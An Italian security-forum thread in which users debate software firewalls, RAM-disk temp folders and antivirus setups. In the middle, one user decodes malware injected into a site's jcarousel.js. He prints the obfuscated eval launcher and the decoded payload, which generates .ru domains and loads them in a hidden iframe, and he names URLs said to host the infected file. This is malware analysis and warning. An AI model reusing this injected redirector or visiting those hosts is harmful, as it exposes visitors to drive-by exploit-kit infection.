... e quindi? La macchina è già infetta, il firewall non servirebbe a nulla, in questo caso, per aumentarne la sicurezza, visto che è già compromessa
no.
Sequenza temporale dell'exploit che immagino:
PC pulito->
visito un sito compromesso che attiva un malware funzionante in RAM->
fa i suoi porci comodi ma, nel momento in cui tenta di inviare i dati all'esterno, il Firewall avvisa che il browser (che solitamente usa la porta 80) vuole "uscire" sulla porta XYZ...




mi trasferisco di là
bene

Sì, ma fammi un esempio pratico di quando è utile farlo.

per tantissimi è utile :D o credi che tutti abbiano (esempio) Photoshop regolare ? ;)

per tantissimi è utile :D o credi che tutti abbiano (esempio) Photoshop regolare ? ;)Spiegami, per favore, a cosa dovrebbe servire in questo caso.
A bloccare meccanismi di attivazione o controllo licenze?
E pensi davvero che serva / sia necessario, un firewall aggiuntivo?
Pensavo fosse un thread sulla protezione del computer, non sulla Sprotezione dei programmi (che in realtà è stato il mio primo impiego, ma a quel tempo non esisteva una legge italiano che lo vietasse).

no.
Sequenza temporale dell'exploit che immagino:
PC pulito->
visito un sito compromesso che attiva un malware funzionante in RAM->
fa i suoi porci comodi ma, nel momento in cui tenta di inviare i dati all'esterno, il Firewall avvisa che il browser (che solitamente usa la porta 80) vuole "uscire" sulla porta XYZ...

Mah... siamo sempre lì. Sei GIA' infetto.
Un malware funzionante in RAM, come ci è arrivato?
E poi, perchè non dovrebbe usare la porta 80 (se è fatto minimamente bene, diciamo da un non bimbominkia?)

PS se mi gira bene, ma non accadrà, magari demolisco lo UAC ;)

Un'aggiunta che non mi sembra di aver mai visto (però non son sicuro, son 200 pagine).

L'uomo saggio crea un ramdisk e ci mette sopra sia la cartella TEMP (se ha abbastanza RAM, ma oggi costa poco e i sistemi a 64 bit sono l'ideale) sia le cartelle delle cache dei vari browser.

Non è che sia "magico", però una buona parte di virusselli e schifezze varie "entra" proprio da lì (%temp% e cache), al riavvio successivo vengono ovviamente spazzati via (rimangono ovviamente i riferimenti nel registro)

E' un esempio non certo di "metodo magico", ma "costa" davvero poco (anzi aumenta pure le prestazioni).

Poi ci sono variazioni più o meno fantasiose e più o meno scomode per "rilocare" parte dei rami USERS che sono, a loro volta, più facilmente "sedi" predilette da virusselli, ma è per veri fanatici (io non lo sono)

Un'aggiunta che non mi sembra di aver mai visto (però non son sicuro, son 200 pagine).

L'uomo saggio crea un ramdisk e ci mette sopra sia la cartella TEMP (se ha abbastanza RAM, ma oggi costa poco e i sistemi a 64 bit sono l'ideale) sia le cartelle delle cache dei vari browser.

Non è che sia "magico", però una buona parte di virusselli e schifezze varie "entra" proprio da lì (%temp% e cache), al riavvio successivo vengono ovviamente spazzati via (rimangono ovviamente i riferimenti nel registro)

E' un esempio non certo di "metodo magico", ma "costa" davvero poco (anzi aumenta pure le prestazioni).

Poi ci sono variazioni più o meno fantasiose e più o meno scomode per "rilocare" parte dei rami USERS che sono, a loro volta, più facilmente "sedi" predilette da virusselli, ma è per veri fanatici (io non lo sono)

vuoi dire tutte le cartelle temp? cioè quella %temp% e : la cartella Temp, presente nella cartella C:\Windows, utilizzata da Windows per e i suoi file temporanei ?

vuoi dire tutte le cartelle temp? cioè quella %temp% e : la cartella Temp, presente nella cartella C:\Windows, utilizzata da Windows per e i suoi file temporanei ?
Sì.
Senza dimenticare, ovviamente, le cache

Io posso dire che (molto velocemente perche' e' successo tempo addietro):
stavo aggiornando un software presente nella mia macchina (se non erro era extract now ma non ci metto la mano sul fuoco) quando ad un certo punto OA (in modalita' apprendimento addirittura, chi conosce il programma sa di cosa parlo) mi segnalava che c'era in corso il tentativo di installare anche altro insieme all'aggiornamento di cui sopra.

Il firewall (dotato hips a livello kernel) congelava il tutto ed io ho avuto la possibilita' di fermare il download e fare una bella pulizia (nell'eventualita' fosse passato qualcosa).

Domanda: senza firewall (software) cosa sarebbe successo?

Io posso dire che (molto velocemente perche' e' successo tempo addietro):
stavo aggiornando un software presente nella mia macchina (se non erro era extract now ma non ci metto la mano sul fuoco) quando ad un certo punto OA (in modalita' apprendimento addirittura, chi conosce il programma sa di cosa parlo) mi segnalava che c'era in corso il tentativo di installare anche altro insieme all'aggiornamento di cui sopra.

Il firewall (dotato hips a livello kernel) congelava il tutto ed io ho avuto la possibilita' di fermare il download e fare una bella pulizia (nell'eventualita' fosse passato qualcosa).

Domanda: senza firewall (software) cosa sarebbe successo?
Non so. Cosa sarebbe successo? Magari ti trovavi una googlesolcazzo toolbar?

[...] stavo aggiornando un software [...] quando ad un certo punto OA [...] mi segnalava che [...]

Domanda: senza firewall (software) cosa sarebbe successo?
credo che fcorbelli, parlando di FW, si riferisse esclusivamente al FW nudo e crudo e non ad ulteriori "strati"...


Mah... siamo sempre lì. Sei GIA' infetto.
Un malware funzionante in RAM, come ci è arrivato?
per osmosi non credo, dunque ritengo più probabile il canale browser come vettore di infezione tramite visita di un sito compromesso.

A quel punto lo so anch'io che, finchè non rebooti il PC, il malware-vivente-in-RAM (o malware per-sessione :p ) è attivo...



E poi, perchè non dovrebbe usare la porta 80 (se è fatto minimamente bene, diciamo da un non bimbominkia?)

è vero anche questo...

Non so. Cosa sarebbe successo? Magari ti trovavi una googlesolcazzo toolbar?

Non era una toolbar, si trattava di spyware/malware, poco ma sicuro.
E comunque, fosse stata una toolbar indesiderata? Senza un software in grado di riconoscerla ce l'avrei avuta bella che installata.
Prevenire e' meglio che curare giusto?

Sai quante volte navigando in internet vengo avvisato dall'antivirus (o dagli stessi dns) che il sito in questione e' pericoloso?

Tornando al discorso di prima, la sicurezza totale non esiste, ma non dobbiamo andare agli antipodi scrivendo che un firewall e/o altri software non servono.

All'inizio, quando di pc et similia non ne sapevo granche', avro' avuto fortuna a non beccare nulla.
Una volta iscrittomi a questo forum e leggendo altro in giro, ho sovraccaricato di antiquesto ed antiquello software la mia macchina (intendo il pc).
A distanza di tempo e per svariati motivi, ho ridotto all'osso la mia configurazione di sicurezza.
E' vero, in firma forse si evincera' altro, ma comunque sono mesi che non faccio una scansione con antispyware e antirootkit; l'antivirus lo lancio quando ad esempio vado a cena e non sto davanti lo schermo, e comuqnue lo faccio una volta dopo 2/3 mesi.

Oramai, navigando con solo firefox e addons dedicati alla sicurezza oltre alla sandboxie (chrome ce l'ha nativamente), mi ritengo relativamente al sicuro, coadiuvato su xp da OA e su seven dall'UAC.

Che poi possano essere bypassati anche questi dispositivi, bhe', e' normale. . . ma deve essere un attacco mirato.

Non era una toolbar, si trattava di spyware/malware, poco ma sicuro.O una qualsiasi altra cosa, tipo ad esempio un modulo runtime .NET solcazzo.
Semplicemente non lo sai.
Corretto?
non dobbiamo andare agli antipodi scrivendo che un firewall e/o altri software non servono.Bhè mica voglio convincere qualcuno.

Parli del diavolo e spuntano le corna.
Cercavo un'app per il mio tablet e guarda cosa mi ritrovo in una pagina?

http://s17.postimage.org/72s7hot9n/Immagine.jpg (http://postimage.org/image/72s7hot9n/)

...ma comunque sono mesi che non faccio una scansione con antispyware e antirootkit; l'antivirus lo lancio quando ad esempio vado a cena e non sto davanti lo schermo, e comuqnue lo faccio una volta dopo 2/3 mesi.Bhè guarda i casi, non lancio mai antispyware antirookit antivirus o quello che vuoi, non uso altra "roba varia".
su seven dall'UAC.
Che poi possano essere bypassati anche questi dispositivi, bhe', e' normale. . . ma deve essere un attacco mirato.
Nessun attacco mirato.
La verità è che UAC, storicamente, si è già dimostrato preda dei soliti difetti che ne rendono (più correttamente possono renderlo) bypassabile mediante la classica escalation dei privilegi.
E' ormai un fatto storico, risale se non ricordo male al 2010-2011, il ritrovamento di un bug dentro una parte del kernel windows, tale per cui si poteva causare il più classico dei buffer overflow con relativa escalation, alla faccia di UAC.
Patch di Microsoft e via così.

Ovvero UAC non è la panacea di tutti i mali.
---
Per par-condicio, così almeno non mi bannano subito, segnalo che lo stesso comando sudo di Linux (usato per la verità anche su Mac, visto che è un progetto GNU e non Linux, però non mi dilungo) ha un buggetto introdotto in una certa parte del sorgente (per la precisione, anche qui vado a memoria, viene verificata il match della regola per ipv6 anche se quella ipv4 fallisce, per il semplice motivo che manca un break nel codice C)
---
Però resta un fatto: le VORAGINI, e intendo proprio VORAGINI saltano fuori nei programmi applicativi e/o relativi plugin, i curiosi possono controllare le mitiche patch microsoft del martedì ( :eek: ) dove c'è un po' di tutto.
Adobe PDF, Flash, Java, .NET e chi più ne ha ne metta (perfino la sandbox di chrome, qualche tempo fa, è risultata non perfettamente immune).

Poi volendo possiamo tirar dentro di tutto, dal meccanismo di autenticazione di mysql fortemente difettoso a seconda del segno del flag ritornato in una certa funzione (!!) e via di questo passo.
---
Non è che un firewall software mi faccia quindi dormire, francamente, più sicuro.

Poi ognuno la veda come vuole.

Parli del diavolo e spuntano le corna.
Cercavo un'app per il mio tablet e guarda cosa mi ritrovo in una pagina?

http://s17.postimage.org/72s7hot9n/Immagine.jpg (http://postimage.org/image/72s7hot9n/)

Guarda bene e vedrai che è esattamente relativo a quanto ho scritto, e perfino ricade nell'ultimo suggerimento che ho messo oggi
:ciapet:

O una qualsiasi altra cosa, tipo ad esempio un modulo runtime .NET solcazzo.
Semplicemente non lo sai.
Corretto?
Bhè mica voglio convincere qualcuno.

Non me lo ricordo, e' diversa la cosa, e' successo tempo addietro, altrimenti mi sarei premunito di aggiungere piu' informazioni al riguardo.

Se non si vuol convincere nessuno, basta scrivere: "imho (http://it.wikipedia.org/wiki/IMHO)" oppure semplicemente "a mio modesto parere o punto di vista".
Scusami ma le tue sono affermazioni, non osservazioni.

Guarda bene e vedrai che è esattamente relativo a quanto ho scritto, e perfino ricade nell'ultimo suggerimento che ho messo oggi
:ciapet:

Quale suggerimento scusami?
Java? File temp? Add-ons dei browser?

Non si vede ma sono sotto returnil. . .
Al prossimo riavvio, sparisce ogni cosa ammesso fosse passata qualcosa sotto il naso di avast e del firewall.

Quale suggerimento scusami?
Java? File temp? Add-ons dei browser?

Non si vede ma sono sotto returnil. . .
Al prossimo riavvio, sparisce ogni cosa ammesso fosse passata qualcosa sotto il naso di avast e del firewall.
Quello è un javascript, gli ho dato una rapidissima occhiata e non mi pare abbia nessun particolare elemento dannoso, immagino che l'antivirus si sia "cacato sotto" perchè c'è un pezzo strano verso la fine.

Se viene scritto in una cartella temporanea RAM al riavvio salta.
E non riguarda un firewall, hardware, software o quello che vuoi, che in questo caso non c'entra nulla.

A mio modestissimo parere o punto di vista (*)

(*) anche se i miei modestissimi pareri sono in realtà assiomi informatici ;)

Bhè guarda i casi, non lancio mai antispyware antirookit antivirus o quello che vuoi, non uso altra "roba varia".

Nessun attacco mirato.
La verità è che UAC, storicamente, si è già dimostrato preda dei soliti difetti che ne rendono (più correttamente possono renderlo) bypassabile mediante la classica escalation dei privilegi.
E' ormai un fatto storico, risale se non ricordo male al 2010-2011, il ritrovamento di un bug dentro una parte del kernel windows, tale per cui si poteva causare il più classico dei buffer overflow con relativa escalation, alla faccia di UAC.
Patch di Microsoft e via così.

Ovvero UAC non è la panacea di tutti i mali.
---
Per par-condicio, così almeno non mi bannano subito, segnalo che lo stesso comando sudo di Linux (usato per la verità anche su Mac, visto che è un progetto GNU e non Linux, però non mi dilungo) ha un buggetto introdotto in una certa parte del sorgente (per la precisione, anche qui vado a memoria, viene verificata il match della regola per ipv6 anche se quella ipv4 fallisce, per il semplice motivo che manca un break nel codice C)
---
Però resta un fatto: le VORAGINI, e intendo proprio VORAGINI saltano fuori nei programmi applicativi e/o relativi plugin, i curiosi possono controllare le mitiche patch microsoft del martedì ( :eek: ) dove c'è un po' di tutto.
Adobe PDF, Flash, Java, .NET e chi più ne ha ne metta (perfino la sandbox di chrome, qualche tempo fa, è risultata non perfettamente immune).

Poi volendo possiamo tirar dentro di tutto, dal meccanismo di autenticazione di mysql fortemente difettoso a seconda del segno del flag ritornato in una certa funzione (!!) e via di questo passo.
---
Non è che un firewall software mi faccia quindi dormire, francamente, più sicuro.

Poi ognuno la veda come vuole.

L'ho gia' scritto in un altro post, sei un esperto nel campo, quindi tanto di cappello.

Rivolgo ora a te la tua stessa domanda con la quale hai esordito:
secondo te, quale e' la miglior sicurezza? Ovvero, cosa e' che si puo' definire tale o che si possa anche minimamente avvicinare a tale termine?

Ce l'ho scritto anche in firma: nessuno nasce imparato, quindi gentilmente (e ti ringrazio in anticipo), potresti dirmelo?

C'e' sempre da imparare no? :)

Quello è un javascript, gli ho dato una rapidissima occhiata e non mi pare abbia nessun particolare elemento dannoso, immagino che l'antivirus si sia "cacato sotto" perchè c'è un pezzo strano verso la fine.

Se viene scritto in una cartella temporanea RAM al riavvio salta.
E non riguarda un firewall, hardware, software o quello che vuoi, che in questo caso non c'entra nulla.

A mio modestissimo parere o punto di vista (*)

(*) anche se i miei modestissimi pareri sono in realtà assiomi informatici ;)

Meglio un falso positivo in piu' che un malware dentro il pc.
Scusami ma non ho basi in epistemologia.

Riguardo all'alert di prima:

https://www.virustotal.com/file/6d7ca617d1e7277c684efd750d2ce281d44c784aee8b1bbc848976ac121adad7/analysis/

Rivolgo ora a te la tua stessa domanda con la quale hai esordito: secondo te, quale e' la miglior sicurezza? Ovvero, cosa e' che si puo' definire tale o che si possa anche minimamente avvicinare a tale termine?
Se rispondo succede un disastro, è il primo post che ho messo in questo thread.
Riguardo a quel javascript ti confermo che c'è una robina strana appesa in fondo, non ti so dire se è un sistema di "protezione" (per rendere meno banale copiare un pezzo di codice di testo) oppure se è un tentativo di usare un qualche bug per fare non so che.
Può essere quindi un falso positivo, nel senso che l'antivirus vedendo "una roba strana" si proccupa, oppure anche un vero malware.

Se trovo il tempo lo decodifico, così vediamo

EDIT: confermo che è un malware di qualche genere, e che viene inettato dentro un po' di tutto
(html, php e javascript), evidentemente anche in versioni bacate di WORDPRESS (o meglio con privilegi
di scrittura ove non dovrebbero esserci).
Sembra perfino abbastanza diffuso su internet

Se rispondo succede un disastro, è il primo post che ho messo in questo thread.
Riguardo a quel javascript ti confermo che c'è una robina strana appesa in fondo, non ti so dire se è un sistema di "protezione" (per rendere meno banale copiare un pezzo di codice di testo) oppure se è un tentativo di usare un qualche bug per fare non so che.
Può essere quindi un falso positivo, nel senso che l'antivirus vedendo "una roba strana" si proccupa, oppure anche un vero malware.

Se trovo il tempo lo decodifico, così vediamo

Sopra ti ho messo il link di VT, spero possa tornarti utile.
Ma non preoccuparti, fa nulla :)

Rispetto ad altri utenti "master" come dico io, quelli cioe' preparati e con i controc..... sei un po estremista, ma va bene anche cosi' :p

Un salutone ;)

P.s.
Se poi ci fai sapere secondo te come deve essere impostato un s.o. per la miglior sicurezza, mi fara' piacere.
A presto. . . .

P.p.s.
Utilizzo solo windows, con linux non mi son trovato. Quindi l'esposizione di un set di software e/o di operazioni di sicurezza che ti chiedo e' insindacabilmente legata a questo s.o.

Ciaooo :)

EDIT: confermo che è un malware di qualche genere, e che viene inettato dentro un po' di tutto
(html, php e javascript), evidentemente anche in versioni bacate di WORDPRESS (o meglio con privilegi
di scrittura ove non dovrebbero esserci).
Sembra perfino abbastanza diffuso su internet

Ti ringrazio del tempo che mi hai dedicato.
Buon proseguimento di serata ^_^

Sopra ti ho messo il link di VT, spero possa tornarti utile.
Ma non preoccuparti, fa nulla :) Bhè sto lavorando...
Ma iniziamo con i link esterni
http://i46.tinypic.com/2d1qo02.jpg

Notare i .ru e la "roba strana"

Non vorrei dir cavolate, ma penso che l'incriminato sia quel popo' di roba prima di .ru

Facendo analizare il solo sito, me lo davano pulito, mentre sarebbe il dominio quello incriminato. . .

Da qui si evince il mio grado di conocenza e il timore di andare OT :stordita:

Non vorrei dir cavolate, ma penso che l'incriminato sia quel popo' di roba prima di .ru

Facendo analizare il solo sito, me lo davano pulito, mentre sarebbe il dominio quello incriminato. . .

Da qui si evince il mio grado di conocenza e il timore di andare OT :stordita:Bhè il succo del discorso è (allo stato, sto per andare a cena) che caterve di siti, come al solito, sono configurati male e/o hanno bug di sicurezza.
Questo tipo di malware si limita ad attaccare un pezzo di codice javascript a "qualsiasi cosa", sperando prima o poi di trovare una parte di javascript effettivamente eseguita.
Il programma effettivament eseguito è "codificato" (per modo di dire) dentro un vettore che viene "spacchettato", appena trovo il tempo... lo spacchetto :p

Avrei trovato questo ->

http://www.urlvoid.com/scan/kudena.ru/

Non era una toolbar, si trattava di spyware/malware, poco ma sicuro.
E comunque, fosse stata una toolbar indesiderata? Senza un software in grado di riconoscerla ce l'avrei avuta bella che installata.
Prevenire e' meglio che curare giusto?

Sai quante volte navigando in internet vengo avvisato dall'antivirus (o dagli stessi dns) che il sito in questione e' pericoloso?

Tornando al discorso di prima, la sicurezza totale non esiste, ma non dobbiamo andare agli antipodi scrivendo che un firewall e/o altri software non servono.
per istallare un software non è che si istalla da solo, basta avere l'accortezza sempre di fare istallazione custom e non come vogliono loro :D

Avrei trovato questo ->

http://www.urlvoid.com/scan/kudena.ru/

EDIT: eccolo qua, mi aspettavo di meglio, è un semplice vettore in cui i caratteri ASCII sono
da decodificare modulo 4 +1.

function nextRandomNumber(){
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if(test > 0){
this.seed = test;
} else {
this.seed = test + this.M;
}
return (this.seed * this.oneOverM);
}

function RandomNumberGenerator(unix){
var d = new Date(unix*1000);
var s = d.getHours() > 12 ? 1 : 0;
this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF));
this.A = 48271;
this.M = 2147483647;
this.Q = this.M / this.A;
this.R = this.M % this.A;
this.oneOverM = 1.0 / this.M;
this.next = nextRandomNumber;
return this;
}

function createRandomNumber(r, Min, Max){
return Math.round((Max-Min) * r.next() + Min);
}

function generatePseudoRandomString(unix, length, zone){
var rand = new RandomNumberGenerator(unix);
var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'];
var str = '';
for(var i = 0; i < length; i ++ ){
str += letters[createRandomNumber(rand, 0, letters.length - 1)];
}
return str + '.' + zone;
}

setTimeout(function(){
try{
if(typeof iframeWasCreated == "undefined"){
iframeWasCreated = true;
var unix = Math.round(+new Date()/1000);
var domainName = generatePseudoRandomString(unix, 16, 'ru');
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=cx");
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
}
}catch(e){}
}, 500);
E questo è il "lanciatore" (un pochino rimaneggiato)
try{
q=document.createElement("p");
q.appendChild(q+"");
}
catch(qw)
{
h=-012/5;
try{bcsd=prototype-2;}
catch(bawg)

[...] ss = quella roba sopra
e(ss);


Mò vado davvero a magnà, a domani i commenti sul frame "nascosto"

In questo caso la situazione è assai più semplice.
Se si utilizza un router ADSL un firewall software non serve a nulla.
Lo riscrivo: a nulla.
Non è questione di maggior o minor competenze.

Un firewall utilizzato per bloccare le connessioni dall'esterno (* prima o poi bisogna che riscriva per bene perchè le porte "stealth" non aggiungono nessuna sicurezza) verso porte e servizi potenzialmente vulnerabili, che è poi l'utilizzo tipico per uso casereccio, è totalmente inutile con un router che droppa tutti i pacchetti senza instradarli verso uno degli host della LAN (situazione normale).

L'uso per il controllo del traffico interno-esterno è parimenti inutile in ambito casereccio, perchè sapere quali siano le mie connessioni, o controllarle, è francamente poco rilevante (oltre che ottenibile banalmente con un netstat su windows, se uno è proprio curioso)
---
Un firewall (hardware o software è uguale, ovviamente "hardware" significa semplicemente "software" a sua volta) interno-esterno ha lo scopo, tipicamente, di IMPEDIRE l'utilizzo di certi servizi.
Esempio bloccare messenger o skype (* per skype la situazione è piuttosto complicata ma fermo qui), impedire l'utilizzo della posta elettronica, emule etc.

Tutte attività che mi paiono difficilmente interessanti in ambito casareccio.
---
L'ulteriore funzione, ovvero quello di "impedire" il diffondersi di "infezioni", ovvero tentar di bloccare un attacco che arriva dalla LAN (esempio: più computer infetti in rete locale) non ha, nuovamente, un grandissimo senso.
Sia perchè se ho un computer solo => non mi arriva nessun attacco.
Sia perchè gli "attacchi" LAN sono poco diffusi e quasi praticamente inutili (* lato-windows avvengono tipicamente sulla 139 per la condivisione NBT, ma lì il firewall non fa tra il nulla ed il quasi nulla)
---
Ecco perchè (versione breve)
- hai un router ADSL?
- hai un singolo computer?
- > non serve a nulla un firewall software, anzi è negativo perchè aumenta la superficie d'attacco e quindi, paradossalmente, la vulnerabilità
---
Poi queste sono le mie conclusioni, magari qualcuno argomenta qualcosa di diverso, ma NON sulla falsariga "male non fa... meglio metterlo... non si sa mai..." e così via.

Intercetta con il FW del Router o con il comando Netstat, un processo legittimo iniettato dal malware di turno.

Se rispondo succede un disastro, è il primo post che ho messo in questo thread.
Riguardo a quel javascript ti confermo che c'è una robina strana appesa in fondo, non ti so dire se è un sistema di "protezione" (per rendere meno banale copiare un pezzo di codice di testo) oppure se è un tentativo di usare un qualche bug per fare non so che.
Può essere quindi un falso positivo, nel senso che l'antivirus vedendo "una roba strana" si proccupa, oppure anche un vero malware.

Se trovo il tempo lo decodifico, così vediamo

EDIT: confermo che è un malware di qualche genere, e che viene inettato dentro un po' di tutto
(html, php e javascript), evidentemente anche in versioni bacate di WORDPRESS (o meglio con privilegi
di scrittura ove non dovrebbero esserci).
Sembra perfino abbastanza diffuso su internet

Javascript Trojan >>>>> Blackhole Exploit Kit

EDIT: eccolo qua, mi aspettavo di meglio, è un semplice vettore in cui i caratteri ASCII sono
da decodificare modulo 4 +1.

Si sono evoluti :D , 2 mesi fà ne trovai uno simile che ricomponeva il nome usando il valore decimale castandolo a char

Si sono evoluti :D , 2 mesi fà ne trovai uno simile che ricomponeva il nome usando il valore decimale castandolo a char


/*km0ae9gr6m*/try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?("fromCharC"+"ode"):"";e=window["e"+"val"];n=[...];if(window.document)for(i=6-2-1-2-1;-1771+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e(ss);}}/*qhk6sa6g1c*/
Mah, ci ho messo un 5 minuti a "sproteggerlo", è il classico bimbominkia-malware

/*km0ae9gr6m*/try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?("fromCharC"+"ode"):"";e=window["e"+"val"];n=[...];if(window.document)for(i=6-2-1-2-1;-1771+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e(ss);}}/*qhk6sa6g1c*/
Mah, ci ho messo un 5 minuti a "sproteggerlo", è il classico bimbominkia-malware

https://www.virustotal.com/file/9bf464d28386750cd6b68e12e1bee657f63ee2b39690c282b446c9ce32742ce3/analysis/1340014286/

https://www.virustotal.com/file/9bf464d28386750cd6b68e12e1bee657f63ee2b39690c282b446c9ce32742ce3/analysis/1340014286/

Se hai sottoposto il jcarousel.js del sito androidianiqualcosa segnalo che l'hanno già corretto ieri.
Questo è l'originale di quel sito
francocorbelli.com/virusselli/jcarousel.js
da cui ho "sprotetto" il malware

Ce ne son tanti in giro, eccone uno carino
temptationfoods.com/brand_KarenAnand_Conserves.asp?catid=1

Se hai sottoposto il jcarousel.js del sito androidianiqualcosa segnalo che l'hanno già corretto ieri.
Questo è l'originale di quel sito
francocorbelli.com/virusselli/jcarousel.js
da cui ho "sprotetto" il malware

Ce ne son tanti in giro, eccone uno carino
temptationfoods.com/brand_KarenAnand_Conserves.asp?catid=1

http://www.hwupgrade.it/forum/showpost.php?p=37655664&postcount=4855

Se hai sottoposto il jcarousel.js del sito androidianiqualcosa segnalo che l'hanno già corretto ieri.
Questo è l'originale di quel sito
francocorbelli.com/virusselli/jcarousel.js
da cui ho "sprotetto" il malware


Ho aperto il sito su evidenziato ed è uscito l'avviso dell'antivirus.
Posso stare tranquillo?:muro:

Ho aperto il sito su evidenziato ed è uscito l'avviso dell'antivirus.
idem
http://s16.postimage.org/h1184erpt/Screen00312.jpg (http://postimage.org/image/h1184erpt/)

Ho aperto il sito su evidenziato ed è uscito l'avviso dell'antivirus.
Posso stare tranquillo?:muro:

idem



Certo che è ben strano e degno di essere riportato che uno mette su un server un file malevolo e se si prova a scaricare gli antivirus intervengono a bloccare l'operazione. Decisamente strano... ma di che hanno discusso negli ultimi post di questo thread? ;)


Saluti.

Ho aperto il sito su evidenziato ed è uscito l'avviso dell'antivirus.
Posso stare tranquillo?:muro:

idem
http://s16.postimage.org/h1184erpt/Screen00312.jpg (http://postimage.org/image/h1184erpt/)

Perchè aprite un link editato?

Perchè aprite un link editato?

hai ragione

Ho svuotato la cartella temp e quella di chrome, ora è normale che ogni volta che apro la pagina di questo forum precedente a questa (pag 243, ossia dove era il link) mi esca l'avviso dell'antivirus?

hai ragione

Ho svuotato la cartella temp e quella di chrome, ora è normale che ogni volta che apro la pagina di questo forum precedente a questa (pag 243, ossia dove era il link) mi esca l'avviso dell'antivirus?

Si

Consiglio su configurazione di sicurezza su windows 7 64 bit
real time:
1.antivirus: avira personal 12
2.firewall:Private Firewall 7.0.28.1

on demand:
HitmanPro 3.6.0 64bit
Malwarebytes Anti-Malware
Sandboxie (per navigazione su siti sconosciuti e per aprire programmi sconosciuti e potenzialmente infetti)

Browser:
Firefox-Google Chrome-Opera con Adblockplus+Wot

Norton dns A - Security (malware, phishing sites and scam sites) configurati direttamente nel router

Chiedo giudizi sulla configurazione e consigli su eventuali miglioramenti!

@ the_noiser
Per me la tua configurazione va benissimo. Non cambierei nè più nè meno.

@ the_noiser
Per me la tua configurazione va benissimo. Non cambierei nè più nè meno.
benissimo!!!! :D
pensavo dovessi configurare meglio i browser con qualche plugin di sicurezza in più :fagiano:
volendo fare qualche test???

idem
http://s16.postimage.org/h1184erpt/Screen00312.jpg (http://postimage.org/image/h1184erpt/)
Con la versione personal di avira?
viene bloccato l'url?

Sulla questione browser c'è questo specifico thread (http://www.hwupgrade.it/forum/showthread.php?t=1955648) in cui vengono suggerite le migliori configurazioni possibili in termini di sicurezza e con suggerimenti riguardo le eventuali estensioni da adottare. E' tutto spiegato in modo molto esauriente. D'altronde utilizzi 3 browser quindi quel thread devi leggerlo per forza :D

Sulla questione browser c'è questo specifico thread (http://www.hwupgrade.it/forum/showthread.php?t=1955648) in cui vengono suggerite le migliori configurazioni possibili in termini di sicurezza e con suggerimenti riguardo le eventuali estensioni da adottare. E' tutto spiegato in modo molto esauriente. D'altronde utilizzi 3 browser quindi quel thread devi leggerlo per forza :D
bene...grazie mille!!!!!
benissimo!!!! :D
Con la versione personal di avira?
viene bloccato l'url?
:mbe: mbe?

Si direbbe che in questa sezione ci sia qualche furbetto ma non so chi sia di preciso...
ho selezionato una frase in un post di questa sezione per fare delle ricerche su Google e mi sono ritrovato con una toolbar in alto su IE9 in cui c'era scritto questo (o qualcosa del genere):

"Le impostazioni del tuo router sono state automaticamente modificate e impostate per utilizzare i Norton DNS...", insomma qualcosa di simile.
Capisco che le impostazioni del router sono bypassabili, infatti ultimamente si è discusso di questo e capisco anche che siete bravissimi per quanto riguarda preparazioni in sicurezza informatica ma mi sembra un po eccessivo che qualcuno di voi faccia certi giochetti con un utente del forum e peraltro con uno che non ha mai rotto le scatole a nessuno. Spero che qualcosa del genere non si ripeta più. Grazie

Si direbbe che in questa sezione ci sia qualche furbetto ma non so chi sia di preciso...
ho selezionato una frase in un post di questa sezione per fare delle ricerche su Google e mi sono ritrovato con una toolbar in alto su IE9 in cui c'era scritto questo (o qualcosa del genere):

"Le impostazioni del tuo router sono state automaticamente modificate e impostate per utilizzare i Norton DNS...", insomma qualcosa di simile.
Capisco che le impostazioni del router sono bypassabili, infatti ultimamente si è discusso di questo e capisco anche che siete bravissimi per quanto riguarda preparazioni in sicurezza informatica ma mi sembra un po eccessivo che qualcuno di voi faccia certi giochetti con un utente del forum e peraltro con uno che non ha mai rotto le scatole a nessuno. Spero che qualcosa del genere non si ripeta più. Grazie
questa è interessante...

Anche se in linea di massima ho capito, hai modo di dettagliare meglio (anche in pvt)?

In particolare, la frase incriminata nel mio caso è questa:

ho selezionato una frase in un post di questa sezione per fare delle ricerche su Google e mi sono ritrovato con una toolbar in alto su IE9 in cui c'era scritto questo (o qualcosa del genere)

sono curioso anchio....e poi perché mai proprio i norton:boh:

Peccato che non abbia creato uno screenshot comunque la toolbar dei menu di IE9 era stata sostiutita con quell'altra toolbar di cui discutevo prima ovvero quello dei Norton DNS...(anche a me sembra strano ma purtroppo è così...), questo è successo selezionando una frase riguardo "antivirus: avira personal 12" e quindi dopo che ho selezionato il link sono stato reindirizzato in quella pagina in cui mi è comparsa questa insolita toolbar di cui discutevo prima...

comunque per sicurezza ho sostiutito la password di accesso al forum e a parte questo ho anche notato che non riesco più a visualizzare direttamente la "Cassaforte LastPass", quindi ora mi tocca anche sostituire tutte le password (ma questo dopotutto non è un grave problema perchè non ho mai salvato password sensibili su LastPass - a parte che tutte le password sono salvate anche in locale).

Peccato che non abbia creato uno screenshot comunque la toolbar dei menu di IE9 era stata sostiutita con quell'altra toolbar di cui discutevo prima ovvero quello dei Norton DNS...(anche a me sembra strano ma purtroppo è così...), questo è successo selezionando una frase riguardo "antivirus: avira personal 12" e quindi dopo che ho selezionato il link sono stato reindirizzato in quella pagina in cui mi è comparsa questa insolita toolbar di cui discutevo prima...

comunque per sicurezza ho sostiutito la password di accesso al forum e a parte questo ho anche notato che non riesco più a visualizzare direttamente la "Cassaforte LastPass", quindi ora mi tocca anche sostituire tutte le password (ma questo dopotutto non è un grave problema perchè non ho mai salvato password sensibili su LastPass - a parte che tutte le password sono salvate anche in locale).

è una cosa abbastanza preoccupante direi...che sarebbe sempre meglio avere il browser nella sandboxie :mad:

Si direbbe che in questa sezione ci sia qualche furbetto ma non so chi sia di preciso...
